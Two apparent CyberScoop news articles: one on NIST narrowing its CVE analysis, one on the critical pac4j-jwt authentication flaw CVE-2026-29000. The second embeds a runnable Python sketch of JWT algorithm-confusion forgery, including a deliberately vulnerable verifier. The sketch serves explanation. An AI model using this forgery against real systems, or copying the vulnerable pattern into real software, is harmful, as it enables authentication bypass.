NIST narrows scope of CVE analysis to keep up with rising tide of vulnerabilities

The federal agency tasked with analyzing security vulnerabilities is overwhelmed as it and other authorities struggle to keep pace with a flood of defects that grows every year. The National Institute of Standards and Technology announced Wednesday that it has capitulated to that deluge and narrowed the priorities for its National Vulnerability Database.

NIST said it will only prioritize analysis for CVEs that appear in the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities catalog, software used in the federal government and critical software defined under Executive Order 14028.

The federal agency’s goal with the change is to achieve long-term sustainability and stabilize the NVD program, which has encountered previous challenges, notably a funding lapse in early 2024 that forced NIST to temporarily stop providing key metadata for many vulnerabilities in the database.

The agency still hasn’t cleared the backlog of unenriched CVEs that built up during that pause and has grown since. 

NIST said it analyzed nearly 42,000 vulnerabilities last year, adding that CVE submissions surged 263% from 2020 to 2025. “We don’t expect this trend to let up anytime soon. Submissions during the first three months of 2026 are nearly one-third higher than the same period last year,” the agency said in a blog post announcing the change. 

Indeed, vulnerabilities are increasing across the board. For instance, Microsoft addressed 165 vulnerabilities Tuesday, its second-largest monthly batch of defects on record.

NIST said CVEs that don’t fit its more narrow criteria will still be listed in the NVD, but they won’t be automatically enriched with additional details. 

“This will allow us to focus on CVEs with the greatest potential for widespread impact,” the agency said. “While CVEs that do not meet these criteria may have a significant impact on affected systems, they generally do not present the same level of systemic risk as those in the prioritized categories.”

Researchers and threat hunters who analyze vulnerabilities for CVE Numbering Authorities (CNAs) and vendors that publish their own assessments view NIST’s new approach as inevitable.

“They had to do something. NIST was woefully behind on classifying CVEs and would likely never have caught up,” Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative, told CyberScoop.

“I’m not sure if it was a herculean task or a sisyphean one, but either way, they were set up for failure under their previous system. This change allows them to prioritize their work,” he added.

NIST’s new approach will affect the vulnerability research community at large, but it will also position private companies and organizations to gain more authority as defenders seek out alternative sources.

Caitlin Condon, vice president of security research at VulnCheck, previously told CyberScoop that prioritization remains a problem, with too many defenders paying attention to vulnerabilities that aren’t worth their time. 

Of the more than 40,000 newly published vulnerabilities that VulnCheck cataloged last year, only 1%, just 422 defects, were exploited in the wild.

NIST is also trying to reduce duplicative efforts with its new approach, effectively leaning even more on CNAs. CVEs that are submitted with a severity rating will no longer receive a separate CVSS score from NIST, the agency said. 

While the agency remains the ultimate authority providing a government-backed catalog of vulnerability assessments, it acknowledged these changes will affect its users.

“This risk-based approach is necessary to manage the current surge in CVE submissions while we work to align our efforts with the needs of the NVD community,” the agency said. “By evolving the NVD to meet today’s challenges, we can ensure that the database remains a reliable, sustainable and publicly available source of information about cybersecurity vulnerabilities.”

The post NIST narrows scope of CVE analysis to keep up with rising tide of vulnerabilities appeared first on CyberScoop.

Critical defect in Java security engine poses serious downstream security risks

A maximum-severity vulnerability in pac4j, an open-source library integrated into hundreds of software packages and repositories, poses a significant security threat, but has thus far received scant attention.

The defect in the Java security engine, which handles authentication across multiple frameworks, has not been observed under exploitation in the wild, even after code review firm CodeAnt AI published a proof-of-concept exploit last week. The company discovered the vulnerability and privately reported it to pac4j’s maintainer, which disclosed the defect and released patches for affected versions of the library within two days.

Some researchers told CyberScoop they are concerned about the vulnerability — CVE-2026-29000 — because it affects a widely deployed Java security engine that attackers can exploit with relative ease.

“A threat actor only needs to access a server’s public RSA key to attempt exploitation,” researchers at Arctic Wolf Labs said in an email. 

These public keys, which are shared openly, are used to encrypt data and enable identity authentication. Attackers can trigger the defect and bypass authentication by forging a JSON Web Token (JWT) or by submitting raw JSON claims via JSON Web Encryption (JWE) in pac4j-jwt, breaking into a system with the highest privileges.
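The pac4j advisory’s internals aren’t reproduced here, but the attack class Arctic Wolf describes, where knowing only a server’s public RSA key is enough to forge a valid token, mirrors the well-known JWT "algorithm confusion" pattern. The sketch below is a minimal, self-contained Python illustration of that general pattern, not pac4j’s actual code: the names (`forge_token`, `naive_verify`, `PUBLIC_KEY_PEM`) are hypothetical, and `naive_verify` deliberately models a vulnerable verifier that trusts the token’s declared algorithm and reuses the public key bytes as an HMAC secret.

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url encoding for each segment.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# A server's RSA public key in PEM form is public by design;
# this placeholder stands in for one an attacker could download.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nexample-key-material\n-----END PUBLIC KEY-----\n"

def forge_token(claims: dict, key: bytes) -> str:
    # The attacker declares a symmetric algorithm (HS256) in the header,
    # then signs with the *public* key bytes as the HMAC secret.
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = b64url(hmac.new(key, signing_input, hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"

def naive_verify(token: str, key: bytes) -> dict:
    # VULNERABLE PATTERN: honors the token's declared algorithm and
    # feeds the RSA public key into HMAC, so the forged signature matches.
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = b64url(hmac.new(key, signing_input, hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig_b64):
        raise ValueError("bad signature")
    pad = "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64 + pad))

forged = forge_token({"sub": "admin", "role": "superuser"}, PUBLIC_KEY_PEM)
print(naive_verify(forged, PUBLIC_KEY_PEM))  # the forged claims are accepted
```

A correct verifier pins the expected algorithm (e.g., RS256 only) and never lets key material cross between asymmetric and symmetric code paths, which is why attacks in this class require no secrets at all.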

“It is currently too early into the lifecycle of this vulnerability to tell if it will materialize into a major threat but the fact that it is a vulnerability in a library makes it more challenging to assess the potential risk,” researchers at Arctic Wolf Labs said. “Downstream consumers of the library may end up needing to issue their own advisories, as we’ve seen with other similar vulnerabilities in the past.”

Amartya Jha, co-founder and CEO at CodeAnt AI, warned that anyone with basic JWT knowledge can achieve exploitation. The vulnerability is a “logic flaw that no pattern-matching scanner or rule-based static application security testing tool would surface, because there’s no single line of code that’s wrong.”

The downstream security risk, as is often the case with open-source software, is widespread. The authentication module for pac4j is integrated into multiple frameworks, including Spring Security, Play Framework, Vert.x, Javalin and others, Jha said.

Many organizations may not realize they depend on pac4j-jwt because it’s not always declared in build files, he added. CodeAnt said it has contacted hundreds of maintainers in the past week to warn them that their packages and repositories are impacted by the vulnerability, which has a CVSS rating of 10.

Researchers haven’t observed any additional PoC exploit code, but they noted the exploit path is easy to reproduce. 

“The conditions for exploitation are favorable,” Jha said. “It’s pre-authentication, requires no secrets, the PoC is public, and the attack surface includes any internet-facing application or API gateway using the affected configuration. The window between public PoC and patch adoption is where the risk is highest.”

The post Critical defect in Java security engine poses serious downstream security risks appeared first on CyberScoop.
